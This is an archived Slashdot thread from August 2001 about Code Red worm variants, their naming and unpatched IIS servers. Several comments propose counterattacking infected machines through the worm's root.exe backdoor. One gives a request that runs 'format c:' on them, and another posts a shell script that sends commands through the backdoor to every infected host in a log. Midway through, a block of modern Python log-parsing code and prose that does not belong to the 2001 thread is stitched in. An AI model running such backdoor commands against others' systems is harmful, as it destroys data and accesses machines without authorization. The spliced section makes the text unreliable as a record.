Microsoft

Code Red III 759

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
This discussion has been archived. No new comments can be posted.

  • How is it that all this time after Code Red first hit the news, so many machines still remain unpatched ? Are the Koreans being disproportionately affected, or is it having major impact over here too ? And if the Koreans are being disproportionately affected, why ? Is press coverage of the virus less prevalent over there ? Could it be something as silly as Koreans not being as adept at the English language ?

    And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?

  • by Moonshadow ( 84117 ) on Friday August 10, 2001 @02:18PM (#2111342)
    Code Red: A New Worm
    Code Red: Microsoft Strikes Back
    Code Red: Return of the Virii
    Code Red: The Not-so Phantom Menace

    And finally...

    Code Red: Attack of the Clones
  • It occurs to me...

    Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

    I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

    Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

    This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulent strains were/are/will be.

    If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

    [TMB]
  • by QwkHyenA ( 207573 ) on Friday August 10, 2001 @01:52PM (#2115668) Homepage
    Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

  • More information? (Score:5, Interesting)

    by Dr. Evil ( 3501 ) on Friday August 10, 2001 @01:52PM (#2115669)

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.

    • Re:More information? (Score:4, Informative)

      by pi_rules ( 123171 ) on Friday August 10, 2001 @02:02PM (#2130407)
      There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

      CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.

      Justin Buist
      • by blakestah ( 91866 ) <blakestah@gmail.com> on Friday August 10, 2001 @02:29PM (#2128819) Homepage
        In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.


        What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
        Still has the XXX and installs the backdoor

        Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

        We can do it for them...

        GET /script/root.exe?+%2fc+format+c:
        • Don't forget the "echo Y" pipe trick :-)
          I don't know if that still works under NT though, fortunately no NT machine available to test it...

        • by BigBlockMopar ( 191202 ) on Friday August 10, 2001 @02:57PM (#2153516) Homepage

          We can do it for them...
          GET /script/root.exe?+%2fc+format+c:

          Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

          Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

          • Re:More information? (Score:5, Informative)

            by ncc74656 ( 45571 ) <scott@alfter.us> on Friday August 10, 2001 @03:49PM (#2117423) Homepage Journal
            Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

            Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

            That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

            I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml [dyndns.org] if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

            Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

            #!/bin/sh
            http_proxy=
            for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
            host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
            7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
            do
            echo -n Sending Code Red message to $i...
            result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
            if [ -n "$result" ]
            then
            ec ho host is down.
            else
            ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
            eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
            +h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
            x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
            +R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
            er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
            +l ocation\).%22 >/dev/null
            ec ho message sent.
            fi
            done

            Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

            • Re:More information? (Score:3, Informative)

              by helleman ( 62840 )
              Modified version to grep standard apache log. Change the top to be the following:

              #!/bin/sh
              for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )`
              do
    • by ryanr ( 30917 ) <ryan@thievco.com> on Friday August 10, 2001 @03:05PM (#2147115) Homepage Journal
      The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

      Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

      For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

      In any case, if someone is able to translate
      this link [mic.go.kr]
      That would be a huge help.
    • by Nate Fox ( 1271 ) on Friday August 10, 2001 @02:00PM (#2156844)
      According to Symantec's page [sarc.com] on CR2:

      Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C
  • Code Red III which is apparently faster and more vicious than its entertaining predecessors.

    I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!
  • by Rob Mac K ( 513824 ) on Friday August 10, 2001 @01:57PM (#2116710) Homepage
    I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

    Thoughts?

    • I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

      I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

      2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

      At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

      Name: authorized-scan1.security.home.net
      Address: 24.0.0.203

      Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

      I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

      (And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

      -Tommy

    • I have been seriously considering the "counterattack" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

      I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

      Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

      This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.
  • I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed and if they do, they don't realize that they're infected since their files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".
  • It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

    None of my antivirus software packages seem to be able to detect it, though ...
  • by I_redwolf ( 51890 ) on Friday August 10, 2001 @01:57PM (#2119502) Homepage Journal
    and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and that's what needs to be addressed. There is nothing significantly fascinating about this program that deserves any notoriety. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in people's code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.
  • by wiredog ( 43288 ) on Friday August 10, 2001 @02:09PM (#2120746) Journal
    From The Register [theregister.co.uk]
  • The newsmakers love it because they get to print lots of muckraking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

    Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

    The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding communication across "the information superhighway."

    The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victimless crimes. Nothing like young ass for the seasoned prison rapists!

    Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

    News like this is the best kind around.

  • by snakecoder ( 235259 ) on Friday August 10, 2001 @02:54PM (#2121499)
    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the latest version on my IIS server?
    Tnks.
  • by isn't my name ( 514234 ) <.moc.htroneerht. .ta. .hsals.> on Friday August 10, 2001 @03:25PM (#2124842)
    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01368.html
  • by pmorrison ( 513514 ) on Friday August 10, 2001 @02:04PM (#2125781)
    It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?
  • by Todd Knarr ( 15451 ) on Friday August 10, 2001 @01:56PM (#2129034) Homepage

    My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

  • by Slur ( 61510 ) on Friday August 10, 2001 @05:39PM (#2130305) Homepage Journal
    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?
    • by nitehorse ( 58425 ) <clee@c133.org> on Friday August 10, 2001 @07:08PM (#2116932)
      Actually, if you add a line in your httpd.conf that looks like this:

      AddHandler cgi-script .ida

      then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

      AddType application/x-httpd-php .php .php3 .ida

      Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

      -Chris
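The log triage Slur describes above, combined with the N/X filler distinction given earlier in the thread, as an added example that is not code from any poster: it picks worm probes out of an Apache access log, groups them by source address, and drafts (but does not send) the notice text. The common log format, the minimum filler run of 20, the sample addresses and all function names are assumptions made for this example.

```python
import re
import socket

# Apache "common" log format: host ident user [time] "METHOD uri proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<uri>\S+)[^"]*" \d{3} \S+'
)
# A default.ida request padded with a long run of one letter. The minimum run
# length of 20 is an assumption chosen to avoid matching ordinary queries.
PROBE_RE = re.compile(r"^/default\.ida\?(?P<fill>N{20,}|X{20,})")

# Filler letter -> family, following the N/X distinction given in the thread.
FAMILY = {"N": "Code Red (CRv1/CRv2)", "X": "CodeRed II"}

# Constructed sample log lines (documentation address ranges, made-up times,
# arbitrary filler length and tail).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2001:13:02:11 -0700] "GET /default.ida?'
    + "N" * 224 + '=a HTTP/1.0" 404 205',
    '198.51.100.7 - - [10/Aug/2001:13:09:40 -0700] "GET /default.ida?'
    + "X" * 224 + '=a HTTP/1.0" 404 205',
    '192.0.2.10 - - [10/Aug/2001:13:12:55 -0700] "GET /default.ida?'
    + "N" * 224 + '=a HTTP/1.0" 404 205',
    '203.0.113.5 - - [10/Aug/2001:13:15:01 -0700] "GET /index.html HTTP/1.0" 200 1043',
    "not a log line",
]


def classify(uri):
    """Return the worm family for a request URI, or None if it is not a probe."""
    m = PROBE_RE.match(uri)
    return FAMILY[m.group("fill")[0]] if m else None


def scan(lines):
    """Aggregate worm probes per source address, in order of first appearance."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        family = classify(m.group("uri")) if m else None
        if family is None:
            continue
        rec = seen.setdefault(
            m.group("host"),
            {"families": set(), "hits": 0, "first": m.group("time")},
        )
        rec["families"].add(family)
        rec["hits"] += 1
        rec["last"] = m.group("time")
    return seen


def reverse_lookup(ip, resolver=socket.gethostbyaddr):
    """PTR lookup that returns None instead of raising when no name exists."""
    try:
        return resolver(ip)[0]
    except OSError:  # socket.herror and socket.gaierror are subclasses
        return None


def draft_notice(ip, rec, resolver=socket.gethostbyaddr):
    """Render (not send) a plain-text notice for the network's contact."""
    name = reverse_lookup(ip, resolver) or "no reverse DNS entry"
    families = ", ".join(sorted(rec["families"]))
    lines = [
        "A host on your network is sending worm probes to my web server.",
        f"Source address: {ip} ({name})",
        f"Request pattern: {families}",
        f"Requests seen: {rec['hits']}, first {rec['first']}, last {rec['last']}",
        "The machine needs the Microsoft IIS patch for this vulnerability.",
    ]
    if "CodeRed II" in rec["families"]:
        lines.append("CodeRed II also leaves a backdoor (root.exe in the scripts "
                     "directory), so the host should be treated as compromised.")
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        # A stub resolver keeps the demo offline; drop it to do real lookups.
        print(draft_notice(ip, rec, resolver=lambda a: ("host.example.net", [], [a])))
        print()
```

Run from cron against the live access log, `scan()` gives one record per offending address, so each network contact gets a single notice rather than one per hit.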
  • by Sloppy ( 14984 ) on Friday August 10, 2001 @01:54PM (#2136357) Homepage Journal
    Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

    • Hehe.

      I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)
  • by GC ( 19160 ) on Friday August 10, 2001 @01:53PM (#2137133)
    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

  • by SethJohnson ( 112166 ) on Friday August 10, 2001 @01:53PM (#2137134) Homepage Journal


    Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).
  • by Rosco P. Coltrane ( 209368 ) on Friday August 10, 2001 @02:06PM (#2146510)
    Why do poor bastards get sued [slashdot.org] for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

    I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

    (of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

    • The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there
    • Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

      THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

      Why should microsoft get sued for having stupid users?

      It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

      I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

      See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

      BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well) Tech people always have to pay because of non-tech people, it's always been like that... just like we have to pay high insurance rates because people have abused it and gave ammo to the insurance companies to f* us.

      I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)
    • As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

      This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

      D
    • To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

      From: Support@iis.microsoft.com
      To: Registered_Users@iis.microsoft.com
      CC:
      Subject: RE: IIS Code Red Worm Patch
      Attachment: Instructions.doc
      Body:

      Hi, how are you?

      We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

      If you have any advice on this file, please email us back!

      See you later!

    • I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

      My view is very simple: Things you buy shouldn't suck.
    • ...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...
      If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.
      • And what do you do if your server runs third-party software that can't run with Service Pack 6?

        Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

        Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.
    • by mblase ( 200735 ) on Friday August 10, 2001 @02:24PM (#2125790)
      Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

      The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

      Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

      But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

      Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

      • A couple things-
        -Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" variant, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
        -The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.
  • Finally (Score:5, Funny)

    by nEoN nOoDlE ( 27594 ) on Friday August 10, 2001 @01:50PM (#2146696)
    Sequels that are actually better than the original.

  • by Malc ( 1751 ) on Friday August 10, 2001 @02:34PM (#2156651)
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    CustomLog /var/log/apache/access.log common env=!code-red-request

    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1
  • by Naerbnic ( 123002 ) on Friday August 10, 2001 @02:00PM (#2156686)
    So, Three Code Reds and a SirCam later, the question just begs to be asked:

    Who's calling Whose code "Potentially Viral"?

"Look! There! Evil!.. pure and simple, total evil from the Eighth Dimension!" -- Buckaroo Banzai
